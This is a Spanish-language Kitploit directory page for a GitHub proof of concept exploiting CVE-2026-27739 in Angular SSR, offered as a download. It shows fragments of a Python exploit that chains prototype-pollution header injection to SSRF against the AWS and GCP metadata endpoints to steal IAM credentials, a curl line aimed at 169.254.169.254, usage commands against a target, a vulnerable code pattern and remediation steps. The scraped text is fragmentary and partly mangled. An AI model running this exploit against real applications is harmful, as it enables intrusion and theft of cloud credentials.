Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-27739-POC — PoC en Python que explota CVE-2026-27739 en Angular SSR: inyección de encabezados mediante contaminación de prototipos y encadenamiento de SSRF a AWS IMDS/GCP metadata para el robo de credenciales. | Kitploit
Herramientas/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de PenetraciónSeguridad de APIs
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

PoC en Python que explota CVE-2026-27739 en Angular SSR: inyección de encabezados mediante contaminación de prototipos y encadenamiento de SSRF a AWS IMDS/GCP metadata para el robo de credenciales.

Ver Repositorio
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. Inyección de encabezados mediante contaminación de prototipos (CVSS: 7.5)

Descripción: Angular SSR procesa parámetros de consulta no seguros que afectan la cadena de prototipos Impacto: Manipulación de encabezados de solicitud, posible encadenamiento de SSRF

Remediación

  1. Eliminar/deshabilitar el procesamiento de encabezados X-Forwarded-* o incluir en lista blanca los proxies conocidos
  2. Implementar validación estricta de URL antes de operaciones propensas a SSRF
  3. Usar express-validator o similar para la sanitización de encabezados
  4. Deshabilitar los endpoints de metadatos de AWS/GCP o usar IMDSv2 con límite de saltos """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() Uso bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify Cómo funciona Prueba de inyección de encabezados: Envía payloads de contaminación de prototipos y encabezados reenviados no seguros que Angular SSR podría procesar de forma insegura Cadena SSRF: Prueba el acceso a AWS IMDS, metadatos de GCP, servicios localhost a través de X-Forwarded-For/X-Original-URL Extracción de tokens IMDSv2: Encadena SSRF para robar tokens de metadatos de AWS y luego credenciales IAM Informes automatizados: Genera un informe de pentest con puntuación CVSS y PoCs Detalles técnicos Causa raíz: Las aplicaciones Angular Universal SSR a menudo reenvían req.headers directamente a APIs internas sin sanitización:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

Descargar herramienta